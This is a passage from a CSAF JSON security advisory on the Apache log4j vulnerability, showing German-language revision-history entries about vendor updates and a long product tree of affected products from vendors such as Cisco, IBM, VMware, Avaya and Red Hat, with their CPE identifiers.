"date": "2022-05-17T22:00:00.000+00:00",
"number": "35",
"summary": "Neue Updates von HCL aufgenommen"
},
{
"date": "2022-06-16T22:00:00.000+00:00",
"number": "36",
"summary": "Neue Updates von Amazon aufgenommen"
},
{
"date": "2022-07-12T22:00:00.000+00:00",
"number": "37",
"summary": "Neue Updates von IBM aufgenommen"
},
{
"date": "2022-07-24T22:00:00.000+00:00",
"number": "38",
"summary": "Neue Updates von HCL aufgenommen"
},
{
"date": "2022-08-14T22:00:00.000+00:00",
"number": "39",
"summary": "Neue Updates von HCL aufgenommen"
},
{
"date": "2022-08-30T22:00:00.000+00:00",
"number": "40",
"summary": "Neue Updates aufgenommen"
},
{
"date": "2022-09-20T22:00:00.000+00:00",
"number": "41",
"summary": "Neue Updates von HCL aufgenommen"
},
{
"date": "2022-12-11T23:00:00.000+00:00",
"number": "42",
"summary": "Neue Updates von Amazon aufgenommen"
}
],
"status": "final",
"version": "42"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"category": "product_name",
"name": "ASC NEO",
"product": {
"name": "ASC NEO",
"product_id": "T021878",
"product_identification_helper": {
"cpe": "cpe:/a:asc:neo:-"
}
}
}
],
"category": "vendor",
"name": "ASC"
},
{
"branches": [
{
"category": "product_name",
"name": "Amazon Linux 2",
"product": {
"name": "Amazon Linux 2",
"product_id": "398363",
"product_identification_helper": {
"cpe": "cpe:/o:amazon:linux_2:-"
}
}
}
],
"category": "vendor",
"name": "Amazon"
},
{
"branches": [
{
"category": "product_name",
"name": "Apache Kafka",
"product": {
"name": "Apache Kafka",
"product_id": "T021247",
"product_identification_helper": {
"cpe": "cpe:/a:apache:kafka:-"
}
}
},
{
"category": "product_name",
"name": "Apache Solr",
"product": {
"name": "Apache Solr",
"product_id": "T021248",
"product_identification_helper": {
"cpe": "cpe:/a:apache:solr:-"
}
}
},
{
"category": "product_name",
"name": "Apache Struts",
"product": {
"name": "Apache Struts",
"product_id": "642",
"product_identification_helper": {
"cpe": "cpe:/a:apache:struts:-"
}
}
},
{
"category": "product_name",
"name": "Apache log4j \u003c 2.16.0",
"product": {
"name": "Apache log4j \u003c 2.16.0",
"product_id": "T021308",
"product_identification_helper": {
"cpe": "cpe:/a:apache:log4j:2.16.0"
}
}
}
],
"category": "vendor",
"name": "Apache"
},
{
"branches": [
{
"category": "product_name",
"name": "Atlassian Bamboo",
"product": {
"name": "Atlassian Bamboo",
"product_id": "T021265",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:bamboo:-"
}
}
},
{
"category": "product_name",
"name": "Atlassian Bitbucket",
"product": {
"name": "Atlassian Bitbucket",
"product_id": "T021356",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:bitbucket:-"
}
}
},
{
"category": "product_name",
"name": "Atlassian Confluence",
"product": {
"name": "Atlassian Confluence",
"product_id": "T016816",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:confluence:-"
}
}
},
{
"category": "product_name",
"name": "Atlassian Crucible",
"product": {
"name": "Atlassian Crucible",
"product_id": "T021266",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:crucible:-"
}
}
},
{
"category": "product_name",
"name": "Atlassian Fisheye",
"product": {
"name": "Atlassian Fisheye",
"product_id": "T021267",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:fisheye:-"
}
}
},
{
"category": "product_name",
"name": "Atlassian Jira Software",
"product": {
"name": "Atlassian Jira Software",
"product_id": "T015027",
"product_identification_helper": {
"cpe": "cpe:/a:atlassian:jira_software:-"
}
}
}
],
"category": "vendor",
"name": "Atlassian"
},
{
"branches": [
{
"category": "product_name",
"name": "Avaya Analytics",
"product": {
"name": "Avaya Analytics",
"product_id": "T021375",
"product_identification_helper": {
"cpe": "cpe:/a:avaya:analytics:-"
}
}
},
{
"category": "product_name",
"name": "Avaya Aura Application Enablement Services",
"product": {
"name": "Avaya Aura Application Enablement Services",
"product_id": "T015516",
"product_identification_helper": {
"cpe": "cpe:/a:avaya:aura_application_enablement_services:-"
}
}
},
{
"category": "product_name",
"name": "Avaya Aura Device Services",
"product": {
"name": "Avaya Aura Device Services",
"product_id": "T015517",
"product_identification_helper": {
"cpe": "cpe:/a:avaya:aura_device_services:-"
}
}
},
{
"category": "product_name",
"name": "Avaya Aura Experience Portal",
"product": {
"name": "Avaya Aura Experience Portal",
"product_id": "T015519",
"product_identification_helper": {
"cpe": "cpe:/a:avaya:aura_experience_portal:-"
}
}
},
{
"category": "product_name",
"name": "Avaya Aura Media Server",
"product": {
"name": "Avaya Aura Media Server",
"product_id": "1017",
"product_identification_helper": {
"cpe": "cpe:/a:avaya:media_server:-"
}
}
},
{
"category": "product_name",
"name": "Avaya Aura Session Manager",
"product": {
"name": "Avaya Aura Session Manager",
"product_id": "T015127",
"product_identification_helper": {
"cpe": "cpe:/a:avaya:session_manager:-"
}
}
},
{
"category": "product_name",
"name": "Avaya Aura System Manager",
"product": {
"name": "Avaya Aura System Manager",
"product_id": "T015518",
"product_identification_helper": {
"cpe": "cpe:/a:avaya:aura_system_manager:-"
}
}
},
{
"category": "product_name",
"name": "Avaya Aura Web Gateway",
"product": {
"name": "Avaya Aura Web Gateway",
"product_id": "T021376",
"product_identification_helper": {
"cpe": "cpe:/a:avaya:aura_web_gateway:-"
}
}
},
{
"category": "product_name",
"name": "Avaya Breeze Platform",
"product": {
"name": "Avaya Breeze Platform",
"product_id": "T015823",
"product_identification_helper": {
"cpe": "cpe:/a:avaya:breeze_platform:-"
}
}
},
{
"category": "product_name",
"name": "Avaya Oceana",
"product": {
"name": "Avaya Oceana",
"product_id": "T016589",
"product_identification_helper": {
"cpe": "cpe:/a:avaya:oceana:-"
}
}
},
{
"category": "product_name",
"name": "Avaya Session Border Controller",
"product": {
"name": "Avaya Session Border Controller",
"product_id": "T015520",
"product_identification_helper": {
"cpe": "cpe:/h:avaya:session_border_controller:-"
}
}
},
{
"category": "product_name",
"name": "Avaya one-X",
"product": {
"name": "Avaya one-X",
"product_id": "1024",
"product_identification_helper": {
"cpe": "cpe:/a:avaya:one-x:-"
}
}
}
],
"category": "vendor",
"name": "Avaya"
},
{
"branches": [
{
"category": "product_name",
"name": "Cisco Application Policy Infrastructure Controller",
"product": {
"name": "Cisco Application Policy Infrastructure Controller",
"product_id": "778219",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:application_policy_infrastructure_controller:-"
}
}
},
{
"category": "product_name",
"name": "Cisco Emergency Responder (ER)",
"product": {
"name": "Cisco Emergency Responder (ER)",
"product_id": "2040",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:emergency_responder:-"
}
}
},
{
"category": "product_name",
"name": "Cisco Finesse",
"product": {
"name": "Cisco Finesse",
"product_id": "199167",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:finesse:-"
}
}
},
{
"category": "product_name",
"name": "Cisco Firepower Dashboard",
"product": {
"name": "Cisco Firepower Dashboard",
"product_id": "T011337",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:firepower:-"
}
}
},
{
"category": "product_name",
"name": "Cisco Identity Services Engine (ISE)",
"product": {
"name": "Cisco Identity Services Engine (ISE)",
"product_id": "T000612",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:identity_services_engine_software:-"
}
}
},
{
"category": "product_name",
"name": "Cisco Integrated Management Controller",
"product": {
"name": "Cisco Integrated Management Controller",
"product_id": "T014392",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:integrated_management_controller:-"
}
}
},
{
"category": "product_name",
"name": "Cisco Network Services Orchestrator",
"product": {
"name": "Cisco Network Services Orchestrator",
"product_id": "T021358",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:network_services_orchestrator:-"
}
}
},
{
"branches": [
{
"category": "product_name",
"name": "Cisco Nexus Dashboard",
"product": {
"name": "Cisco Nexus Dashboard",
"product_id": "T021249",
"product_identification_helper": {
"cpe": "cpe:/h:cisco:nexus:::dashboard"
}
}
},
{
"category": "product_name",
"name": "Cisco Nexus Insights",
"product": {
"name": "Cisco Nexus Insights",
"product_id": "T021357",
"product_identification_helper": {
"cpe": "cpe:/h:cisco:nexus:insights"
}
}
}
],
"category": "product_name",
"name": "Nexus"
},
{
"category": "product_name",
"name": "Cisco SD-WAN vManage",
"product": {
"name": "Cisco SD-WAN vManage",
"product_id": "T018812",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:sd_wan:vmanage"
}
}
},
{
"branches": [
{
"category": "product_name",
"name": "Cisco Unified Communications Manager (CUCM) Session Management Edition",
"product": {
"name": "Cisco Unified Communications Manager (CUCM) Session Management Edition",
"product_id": "T016315",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:unified_communications_manager:session_management_edition"
}
}
},
{
"category": "product_name",
"name": "Cisco Unified Communications Manager (CUCM) Cloud",
"product": {
"name": "Cisco Unified Communications Manager (CUCM) Cloud",
"product_id": "T021250",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:unified_communications_manager:::cloud"
}
}
}
],
"category": "product_name",
"name": "Unified Communications Manager (CUCM)"
},
{
"branches": [
{
"category": "product_name",
"name": "Cisco Unified Computing System (UCS) Director",
"product": {
"name": "Cisco Unified Computing System (UCS) Director",
"product_id": "T017032",
"product_identification_helper": {
"cpe": "cpe:/h:cisco:unified_computing_system:director_6.7.4.1"
}
}
},
{
"category": "product_name",
"name": "Cisco Unified Computing System (UCS) Central Software",
"product": {
"name": "Cisco Unified Computing System (UCS) Central Software",
"product_id": "T021359",
"product_identification_helper": {
"cpe": "cpe:/h:cisco:unified_computing_system:central_software"
}
}
}
],
"category": "product_name",
"name": "Unified Computing System (UCS)"
},
{
"category": "product_name",
"name": "Cisco Unified Contact Center Enterprise",
"product": {
"name": "Cisco Unified Contact Center Enterprise",
"product_id": "2143",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:unified_contact_center_enterprise:-"
}
}
},
{
"category": "product_name",
"name": "Cisco Unified Contact Center Express (UCCX)",
"product": {
"name": "Cisco Unified Contact Center Express (UCCX)",
"product_id": "915286",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:unified_contact_center_express:-"
}
}
},
{
"category": "product_name",
"name": "Cisco Unified Intelligence Center",
"product": {
"name": "Cisco Unified Intelligence Center",
"product_id": "T018811",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:unified_intelligence_center:-"
}
}
},
{
"category": "product_name",
"name": "Cisco Unified Intelligent Contact Manager (ICM)",
"product": {
"name": "Cisco Unified Intelligent Contact Manager (ICM)",
"product_id": "69412",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:unified_intelligent_contact_management_enterprise:-"
}
}
},
{
"category": "product_name",
"name": "Cisco Unity Connection",
"product": {
"name": "Cisco Unity Connection",
"product_id": "T002044",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:unity_connection:-"
}
}
},
{
"category": "product_name",
"name": "Cisco Video Surveillance Operations Manager",
"product": {
"name": "Cisco Video Surveillance Operations Manager",
"product_id": "196088",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:video_surveillance_operations_manager:-"
}
}
},
{
"category": "product_name",
"name": "Cisco WebEx Cloud-Connected UC",
"product": {
"name": "Cisco WebEx Cloud-Connected UC",
"product_id": "T021251",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:webex:::cloud-connected_uc"
}
}
},
{
"category": "product_name",
"name": "Cisco WebEx Meetings Server",
"product": {
"name": "Cisco WebEx Meetings Server",
"product_id": "T001160",
"product_identification_helper": {
"cpe": "cpe:/a:cisco:webex_meetings_server:-"
}
}
}
],
"category": "vendor",
"name": "Cisco"
},
{
"branches": [
{
"category": "product_name",
"name": "Citrix Systems Virtual Apps and Desktops",
"product": {
"name": "Citrix Systems Virtual Apps and Desktops",
"product_id": "876876",
"product_identification_helper": {
"cpe": "cpe:/a:citrix:virtual_apps_and_desktops:-::~~-~~~"
}
}
}
],
"category": "vendor",
"name": "Citrix Systems"
},
{
"branches": [
{
"category": "product_name",
"name": "Debian Linux",
"product": {
"name": "Debian Linux",
"product_id": "2951",
"product_identification_helper": {
"cpe": "cpe:/o:debian:debian_linux:-"
}
}
}
],
"category": "vendor",
"name": "Debian"
},
{
"branches": [
{
"category": "product_name",
"name": "Dell Data Protection Advisor",
"product": {
"name": "Dell Data Protection Advisor",
"product_id": "T021498",
"product_identification_helper": {
"cpe": "cpe:/a:dell:data_protection_advisor:-"
}
}
}
],
"category": "vendor",
"name": "Dell"
},
{
"branches": [
{
"category": "product_name",
"name": "EMC Avamar",
"product": {
"name": "EMC Avamar",
"product_id": "T014381",
"product_identification_helper": {
"cpe": "cpe:/a:emc:avamar:-"
}
}
},
{
"category": "product_name",
"name": "EMC Data Domain",
"product": {
"name": "EMC Data Domain",
"product_id": "T021496",
"product_identification_helper": {
"cpe": "cpe:/o:emc:data_domain:-"
}
}
},
{
"category": "product_name",
"name": "EMC Data Domain OS",
"product": {
"name": "EMC Data Domain OS",
"product_id": "T006099",
"product_identification_helper": {
"cpe": "cpe:/o:emc:data_domain_os:-"
}
}
}
],
"category": "vendor",
"name": "EMC"
},
{
"branches": [
{
"category": "product_name",
"name": "F-Secure Policy Manager",
"product": {
"name": "F-Secure Policy Manager",
"product_id": "T021242",
"product_identification_helper": {
"cpe": "cpe:/a:f-secure:policy_manager:-"
}
}
}
],
"category": "vendor",
"name": "F-Secure"
},
{
"branches": [
{
"category": "product_name",
"name": "HCL Commerce",
"product": {
"name": "HCL Commerce",
"product_id": "T019293",
"product_identification_helper": {
"cpe": "cpe:/a:hcltechsw:commerce:-"
}
}
},
{
"category": "product_name",
"name": "HCL Domino",
"product": {
"name": "HCL Domino",
"product_id": "777623",
"product_identification_helper": {
"cpe": "cpe:/a:hcltech:domino:-"
}
}
}
],
"category": "vendor",
"name": "HCL"
},
{
"branches": [
{
"category": "product_name",
"name": "Hitachi Storage",
"product": {
"name": "Hitachi Storage",
"product_id": "T009295",
"product_identification_helper": {
"cpe": "cpe:/h:hitachi:storage:-"
}
}
}
],
"category": "vendor",
"name": "Hitachi"
},
{
"branches": [
{
"category": "product_name",
"name": "IBM Business Automation Workflow",
"product": {
"name": "IBM Business Automation Workflow",
"product_id": "T019704",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:business_automation_workflow:-"
}
}
},
{
"category": "product_name",
"name": "IBM Content Manager",
"product": {
"name": "IBM Content Manager",
"product_id": "T023838",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:content_manager:-"
}
}
},
{
"category": "product_name",
"name": "IBM DB2",
"product": {
"name": "IBM DB2",
"product_id": "5104",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:db2:-"
}
}
},
{
"category": "product_name",
"name": "IBM InfoSphere Information Server",
"product": {
"name": "IBM InfoSphere Information Server",
"product_id": "T019995",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:infosphere_information_server:-"
}
}
},
{
"branches": [
{
"category": "product_name",
"name": "IBM Informix",
"product": {
"name": "IBM Informix",
"product_id": "5121",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:informix:-"
}
}
},
{
"category": "product_name",
"name": "IBM Informix Dynamic Server",
"product": {
"name": "IBM Informix Dynamic Server",
"product_id": "T021953",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:informix:::dynamic_server"
}
}
}
],
"category": "product_name",
"name": "Informix"
},
{
"branches": [
{
"category": "product_name",
"name": "IBM MQ 9.1",
"product": {
"name": "IBM MQ 9.1",
"product_id": "T014765",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:mq:9.1"
}
}
},
{
"category": "product_name",
"name": "IBM MQ 9.2",
"product": {
"name": "IBM MQ 9.2",
"product_id": "T016984",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:mq:9.2"
}
}
}
],
"category": "product_name",
"name": "MQ"
},
{
"category": "product_name",
"name": "IBM Operational Decision Manager",
"product": {
"name": "IBM Operational Decision Manager",
"product_id": "T005180",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:operational_decision_manager:-"
}
}
},
{
"category": "product_name",
"name": "IBM Rational Software Architect",
"product": {
"name": "IBM Rational Software Architect",
"product_id": "T005181",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:rational_software_architect:-"
}
}
},
{
"category": "product_name",
"name": "IBM SPSS",
"product": {
"name": "IBM SPSS",
"product_id": "T013570",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:spss:-"
}
}
},
{
"category": "product_name",
"name": "IBM Security Guardium",
"product": {
"name": "IBM Security Guardium",
"product_id": "T021345",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:security_guardium:-"
}
}
},
{
"category": "product_name",
"name": "IBM Spectrum Protect",
"product": {
"name": "IBM Spectrum Protect",
"product_id": "T013661",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:spectrum_protect:-"
}
}
},
{
"category": "product_name",
"name": "IBM Spectrum Scale",
"product": {
"name": "IBM Spectrum Scale",
"product_id": "T019402",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:spectrum_scale:-"
}
}
},
{
"category": "product_name",
"name": "IBM Tivoli Monitoring",
"product": {
"name": "IBM Tivoli Monitoring",
"product_id": "T011128",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:tivoli_monitoring:-"
}
}
},
{
"category": "product_name",
"name": "IBM Tivoli Netcool/OMNIbus",
"product": {
"name": "IBM Tivoli Netcool/OMNIbus",
"product_id": "T004181",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:tivoli_netcool%2fomnibus:-"
}
}
},
{
"category": "product_name",
"name": "IBM WebSphere Application Server",
"product": {
"name": "IBM WebSphere Application Server",
"product_id": "5198",
"product_identification_helper": {
"cpe": "cpe:/a:ibm:websphere_application_server:-"
}
}
}
],
"category": "vendor",
"name": "IBM"
},
{
"branches": [
{
"category": "product_name",
"name": "Juniper Junos Space",
"product": {
"name": "Juniper Junos Space",
"product_id": "T003343",
"product_identification_helper": {
"cpe": "cpe:/a:juniper:junos_space:-"
}
}
}
],
"category": "vendor",
"name": "Juniper"
},
{
"branches": [
{
"category": "product_name",
"name": "Kyocera Printer",
"product": {
"name": "Kyocera Printer",
"product_id": "T015471",
"product_identification_helper": {
"cpe": "cpe:/h:kyocera:printer:-"
}
}
}
],
"category": "vendor",
"name": "Kyocera"
},
{
"branches": [
{
"category": "product_name",
"name": "NetApp ActiveIQ Unified Manager",
"product": {
"name": "NetApp ActiveIQ Unified Manager",
"product_id": "T016960",
"product_identification_helper": {
"cpe": "cpe:/a:netapp:active_iq_unified_manager:-"
}
}
},
{
"category": "product_name",
"name": "NetApp Data ONTAP Tools for VMware vSphere",
"product": {
"name": "NetApp Data ONTAP Tools for VMware vSphere",
"product_id": "T021401",
"product_identification_helper": {
"cpe": "cpe:/a:netapp:data_ontap:tools_for_vmware_vsphere"
}
}
}
],
"category": "vendor",
"name": "NetApp"
},
{
"branches": [
{
"category": "product_name",
"name": "Open Source Elasticsearch",
"product": {
"name": "Open Source Elasticsearch",
"product_id": "T010062",
"product_identification_helper": {
"cpe": "cpe:/a:elasticsearch:elasticsearch:-"
}
}
},
{
"category": "product_name",
"name": "Open Source LogStash",
"product": {
"name": "Open Source LogStash",
"product_id": "T021264",
"product_identification_helper": {
"cpe": "cpe:/a:elasticsearch:logstash:-"
}
}
}
],
"category": "vendor",
"name": "Open Source"
},
{
"branches": [
{
"category": "product_name",
"name": "PaloAlto Networks PAN-OS",
"product": {
"name": "PaloAlto Networks PAN-OS",
"product_id": "T012790",
"product_identification_helper": {
"cpe": "cpe:/o:paloaltonetworks:pan-os:-"
}
}
}
],
"category": "vendor",
"name": "PaloAlto Networks"
},
{
"branches": [
{
"category": "product_name",
"name": "QNAP NAS",
"product": {
"name": "QNAP NAS",
"product_id": "T017100",
"product_identification_helper": {
"cpe": "cpe:/h:qnap:nas:-"
}
}
}
],
"category": "vendor",
"name": "QNAP"
},
{
"branches": [
{
"category": "product_name",
"name": "RSA SecurID Authentication Manager",
"product": {
"name": "RSA SecurID Authentication Manager",
"product_id": "T021245",
"product_identification_helper": {
"cpe": "cpe:/h:rsa:securid:::authentication_manager"
}
}
}
],
"category": "vendor",
"name": "RSA"
},
{
"branches": [
{
"category": "product_name",
"name": "Red Hat Enterprise Linux",
"product": {
"name": "Red Hat Enterprise Linux",
"product_id": "67646",
"product_identification_helper": {
"cpe": "cpe:/o:redhat:enterprise_linux:-"
}
}
},
{
"category": "product_name",
"name": "Red Hat JBoss A-MQ",
"product": {
"name": "Red Hat JBoss A-MQ",
"product_id": "T015887",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:jboss_amq:-"
}
}
},
{
"category": "product_name",
"name": "Red Hat JBoss Enterprise Application Platform",
"product": {
"name": "Red Hat JBoss Enterprise Application Platform",
"product_id": "T003085",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:jboss_enterprise_application_platform:-"
}
}
},
{
"category": "product_name",
"name": "Red Hat OpenShift",
"product": {
"name": "Red Hat OpenShift",
"product_id": "367115",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openshift:-"
}
}
},
{
"category": "product_name",
"name": "Red Hat OpenStack",
"product": {
"name": "Red Hat OpenStack",
"product_id": "T003522",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:openstack:-"
}
}
},
{
"category": "product_name",
"name": "Red Hat Process Automation Manager",
"product": {
"name": "Red Hat Process Automation Manager",
"product_id": "T021270",
"product_identification_helper": {
"cpe": "cpe:/a:redhat:process_automation_manager:-"
}
}
}
],
"category": "vendor",
"name": "Red Hat"
},
{
"branches": [
{
"category": "product_name",
"name": "SAP Software",
"product": {
"name": "SAP Software",
"product_id": "T016476",
"product_identification_helper": {
"cpe": "cpe:/a:sap:sap:-"
}
}
}
],
"category": "vendor",
"name": "SAP"
},
{
"branches": [
{
"category": "product_name",
"name": "SOS GmbH JobScheduler",
"product": {
"name": "SOS GmbH JobScheduler",
"product_id": "T021263",
"product_identification_helper": {
"cpe": "cpe:/a:sos_gmbh:jobscheduler:-"
}
}
}
],
"category": "vendor",
"name": "SOS GmbH"
},
{
"branches": [
{
"category": "product_name",
"name": "SUSE Linux",
"product": {
"name": "SUSE Linux",
"product_id": "T002207",
"product_identification_helper": {
"cpe": "cpe:/o:suse:suse_linux:-"
}
}
}
],
"category": "vendor",
"name": "SUSE"
},
{
"branches": [
{
"category": "product_name",
"name": "Siemens SIMATIC WinCC \u003c V7.4 SP1",
"product": {
"name": "Siemens SIMATIC WinCC \u003c V7.4 SP1",
"product_id": "T021273",
"product_identification_helper": {
"cpe": "cpe:/a:siemens:simatic_wincc:v7.4_sp1"
}
}
},
{
"category": "product_name",
"name": "Siemens SPPA-T3000",
"product": {
"name": "Siemens SPPA-T3000",
"product_id": "668076",
"product_identification_helper": {
"cpe": "cpe:/a:siemens:sppa-t3000_application_server:-"
}
}
}
],
"category": "vendor",
"name": "Siemens"
},
{
"branches": [
{
"category": "product_name",
"name": "SmartBear SoapUI",
"product": {
"name": "SmartBear SoapUI",
"product_id": "T021577",
"product_identification_helper": {
"cpe": "cpe:/a:smartbear:soapui:-"
}
}
}
],
"category": "vendor",
"name": "SmartBear"
},
{
"branches": [
{
"category": "product_name",
"name": "Splunk Splunk Enterprise",
"product": {
"name": "Splunk Splunk Enterprise",
"product_id": "T008911",
"product_identification_helper": {
"cpe": "cpe:/a:splunk:splunk:-"
}
}
}
],
"category": "vendor",
"name": "Splunk"
},
{
"branches": [
{
"category": "product_name",
"name": "Symantec Endpoint Protection Manager",
"product": {
"name": "Symantec Endpoint Protection Manager",
"product_id": "T021244",
"product_identification_helper": {
"cpe": "cpe:/a:symantec:endpoint_protection:::manager"
}
}
}
],
"category": "vendor",
"name": "Symantec"
},
{
"branches": [
{
"category": "product_name",
"name": "TIBCO Managed File Transfer",
"product": {
"name": "TIBCO Managed File Transfer",
"product_id": "T021367",
"product_identification_helper": {
"cpe": "cpe:/a:tibco:managed_file_transfer_internet_server:-"
}
}
},
{
"category": "product_name",
"name": "TIBCO Spotfire",
"product": {
"name": "TIBCO Spotfire",
"product_id": "T009185",
"product_identification_helper": {
"cpe": "cpe:/a:tibco:spotfire:-"
}
}
},
{
"category": "product_name",
"name": "TIBCO Spotfire Statistics Services",
"product": {
"name": "TIBCO Spotfire Statistics Services",
"product_id": "T021366",
"product_identification_helper": {
"cpe": "cpe:/a:tibco:spotfire_statistics_services:-"
}
}
}
],
"category": "vendor",
"name": "TIBCO"
},
{
"branches": [
{
"category": "product_name",
"name": "Ubuntu Linux",
"product": {
"name": "Ubuntu Linux",
"product_id": "T000126",
"product_identification_helper": {
"cpe": "cpe:/o:canonical:ubuntu_linux:-"
}
}
}
],
"category": "vendor",
"name": "Ubuntu"
},
{
"branches": [
{
"category": "product_name",
"name": "Unify OpenScape 4000",
"product": {
"name": "Unify OpenScape 4000",
"product_id": "T018011",
"product_identification_helper": {
"cpe": "cpe:/h:unify:openscape_4000:-"
}
}
},
{
"category": "product_name",
"name": "Unify OpenScape Contact Center",
"product": {
"name": "Unify OpenScape Contact Center",
"product_id": "T008876",
"product_identification_helper": {
"cpe": "cpe:/a:unify:openscape_contact_center:-"
}
}
},
{
"category": "product_name",
"name": "Unify OpenScape Deployment Service (DLS)",
"product": {
"name": "Unify OpenScape Deployment Service (DLS)",
"product_id": "T015711",
"product_identification_helper": {
"cpe": "cpe:/a:unify:openscape_deployment_service:-"
}
}
},
{
"category": "product_name",
"name": "Unify OpenScape Mediaserver",
"product": {
"name": "Unify OpenScape Mediaserver",
"product_id": "T018253",
"product_identification_helper": {
"cpe": "cpe:/a:unify:openscape_mediaserver:-"
}
}
},
{
"category": "product_name",
"name": "Unify OpenScape UC Application \u003c V10.3.10",
"product": {
"name": "Unify OpenScape UC Application \u003c V10.3.10",
"product_id": "T021274",
"product_identification_helper": {
"cpe": "cpe:/a:unify:openscape_uc_application:v10.3.10"
}
}
},
{
"category": "product_name",
"name": "Unify OpenScape Voice",
"product": {
"name": "Unify OpenScape Voice",
"product_id": "T008873",
"product_identification_helper": {
"cpe": "cpe:/a:unify:openscape_voice:-"
}
}
},
{
"category": "product_name",
"name": "Unify OpenScape Xpert",
"product": {
"name": "Unify OpenScape Xpert",
"product_id": "T018014",
"product_identification_helper": {
"cpe": "cpe:/h:unify:openscape_xpert:-"
}
}
}
],
"category": "vendor",
"name": "Unify"
},
{
"branches": [
{
"category": "product_name",
"name": "VMware Carbon Black Cloud Workload",
"product": {
"name": "VMware Carbon Black Cloud Workload",
"product_id": "950382",
"product_identification_helper": {
"cpe": "cpe:/a:vmware:carbon_black_cloud_workload:-"
}
}
},
{
"category": "product_name",
"name": "VMware Cloud Director Object Storage Extension",
"product": {
"name": "VMware Cloud Director Object Storage Extension",
"product_id": "T021402",
"product_identification_helper": {
"cpe": "cpe:/a:vmware:cloud_director:object_storage_extension"
}
}
},
{
"category": "product_name",
"name": "VMware Cloud Foundation",
"product": {
"name": "VMware Cloud Foundation",
"product_id": "658718",
"product_identification_helper": {
"cpe": "cpe:/a:vmware:cloud_foundation:-"
}
}
},
{
"category": "product_name",
"name": "VMware Horizon",
"product": {
"name": "VMware Horizon",
"product_id": "T021252",
"product_identification_helper": {
"cpe": "cpe:/a:vmware:horizon:-"
}
}
},
{
"category": "product_name",
"name": "VMware Identity Manager",
"product": {
"name": "VMware Identity Manager",
"product_id": "T021253",
"product_identification_helper": {
"cpe": "cpe:/a:vmware:identity_manger:-"
}
}
},
{
"category": "product_name",
"name": "VMware NSX Data Center for vSphere",
"product": {
"name": "VMware NSX Data Center for vSphere",
"product_id": "393634",
"product_identification_helper": {
"cpe": "cpe:/a:vmware:nsx_data_center:-"
}
}
},
{
"category": "product_name",
"name": "VMware SD-WAN by VeloCloud",
"product": {
"name": "VMware SD-WAN by VeloCloud",
"product_id": "T021403",
"product_identification_helper": {
"cpe": "cpe:/a:vmware:sd-wan_by_velocloud:-"
}
}
},
{
"branches": [
{
"category": "product_name",
"name": "VMware Workspace One Access Connector",
"product": {
"name": "VMware Workspace One Access Connector",
"product_id": "T021254",
"product_identification_helper": {
"cpe": "cpe:/a:vmware:workspace_one_access:::connector"
}
}
},
{
"category": "product_name",
"name": "VMware Workspace One Access",
"product": {
"name": "VMware Workspace One Access",
"product_id": "T021255",
"product_identification_helper": {
"cpe": "cpe:/a:vmware:workspace_one_access:-"
}
}
}
],
"category": "product_name",
"name": "Workspace One Access"
},
{
"category": "product_name",
"name": "VMware vCenter Server",
"product": {
"name": "VMware vCenter Server",
"product_id": "T012302",
"product_identification_helper": {
"cpe": "cpe:/a:vmware:vcenter_server:-"
}
}
},
{
"category": "product_name",
"name": "VMware vRealize Log Insight",
"product": {
"name": "VMware vRealize Log Insight",
"product_id": "T021256",
"product_identification_helper": {
"cpe": "cpe:/a:vmware:vcenter_log_insight:-"
}
}
},
{
"branches": [
{
"category": "product_name",
"name": "VMware vRealize Operations",
"product": {
"name": "VMware vRealize Operations",
"product_id": "T021257",
"product_identification_helper": {
"cpe": "cpe:/a:vmware:vrealize_operations:-"
}
}
},
{
"category": "product_name",
"name": "VMware vRealize Operations Cloud Proxy",
"product": {
"name": "VMware vRealize Operations Cloud Proxy",
"product_id": "T021404",
"product_identification_helper": {
"cpe": "cpe:/a:vmware:vrealize_operations:::cloud_proxy"
}
}
}
],
"category": "product_name",
"name": "vRealize Operations"
},
{
"category": "product_name",
"name": "VMware vRealize Suite Lifecycle Manager",
"product": {
"name": "VMware vRealize Suite Lifecycle Manager",
"product_id": "T021258",
"product_identification_helper": {
"cpe": "cpe:/a:vmware:vrealize_suite_lifecycle_manager:-"
}
}
}
],
"category": "vendor",
"name": "VMware"
},
{
"branches": [
{
"category": "product_name",
"name": "VMware Tanzu Spring Boot",
"product": {
"name": "VMware Tanzu Spring Boot",
"product_id": "T021262",
"product_identification_helper": {
